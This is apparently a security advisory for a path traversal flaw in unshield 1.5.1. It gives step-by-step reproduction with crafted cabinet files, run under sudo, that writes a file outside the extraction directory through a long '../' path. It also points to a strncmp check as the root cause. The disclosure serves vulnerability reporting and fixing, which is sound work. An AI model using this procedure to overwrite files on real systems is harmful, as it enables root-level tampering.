unshield
unshield copied to clipboard
Published
20 hours ago •
twogood
twogood
Path traversal bug in src/unshield.c
Impact:
The latest version 1.5.1 has a path traversal vulnerability with root permission that allows the attacker to create or write to files outside the current directory due to improper string comparisons between real paths.
How to reproduce:
$ wget https://github.com/twogood/unshield/archive/refs/tags/1.5.1.tar.gz
$ tar -xzf unshield-1.5.1.tar.gz
$ cd unshield-1.5.1
$ cmake .
$ make
$ make install
# download cab and hdr files from https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=776193
# must be located together in the same directory
$ cd /
$ sudo mkdir tm
$ cd tm
$ ls /tmp/moo
ls: cannot access /tmp/moo: No such file or directory
$ sudo /home/path/to/unshield-1.5.1/src/unshield x /path/to/data1.cab
Cabinet: data1.cab
extracting: ./Bovine_Files/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/moo
-------- -------
1 files
# verify attack worked
$ ls /tmp/moo
/tmp/moo
Root cause:
https://github.com/twogood/unshield/blob/67bca739edfdb5468412a073b08541dc4c19747c/src/unshield.c#L494-L506
The root cause is the return true value of function strncmp in src/unshield.c that passes if condition in function extract_file
PoC image:
download data1.cab and data1.hdr from https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=776193
